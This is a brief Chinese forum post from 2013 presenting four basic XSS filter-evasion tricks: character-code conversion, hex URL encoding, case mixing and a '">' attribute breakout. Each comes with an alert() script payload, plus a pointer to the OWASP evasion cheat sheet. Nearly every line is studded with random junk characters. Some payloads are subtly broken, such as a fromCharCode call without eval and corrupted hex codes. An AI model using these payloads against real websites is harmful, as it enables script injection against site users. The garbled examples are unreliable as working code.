四种超级基础的绕过方法。1 t* S, t! d0 c
1.转换为ASCII码/ p. I0 i- y& D. t% A: p) `
例子:原脚本为<script>alert(‘I love F4ck’)</script >
% [/ z2 D D* |. T( O9 G- I通过转换,变成:
! a* X7 i2 g; P- S6 E* \<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>. p# n6 r$ ?1 C' o
8 r( }1 G/ ?: }; C
2.转换为HEX(十六进制) o. n# X s& C
例子:原脚本为<script>alert(‘I love F4ck’)</script>! ^+ _1 R/ h3 v4 F* ?
通过转换,变成:
8 l& S6 \8 y3 a9 t( u+ t%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
3 I, w/ @# @' f
! O, T- Z+ _, K5 p3.转换脚本的大小写& Z% {: e2 v. a4 x2 h
例子:原脚本为<script>alert(‘I love F4ck’)</script>. i- |: a$ w. G) G! L; P9 }5 v3 b
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>+ f0 u$ \$ K# m
* |- F! ?5 f+ h! ^9 ~- I4 o
4.增加闭合标记”>
h5 h' _, F( o; W例子:原脚本为<script>alert(‘I love F4ck’)</script>, S$ q! d; M3 L+ [& O; |$ p5 K
转换为:”><script>alert(‘I love F4ck’)</script>: _2 ~3 S, U( ^( [
更详细绕过技术请参考此网页/ o1 S6 ~+ x e; ]
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
4 N! x( U9 d1 B% O% R
4 d+ B; N; }6 B& q! [转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对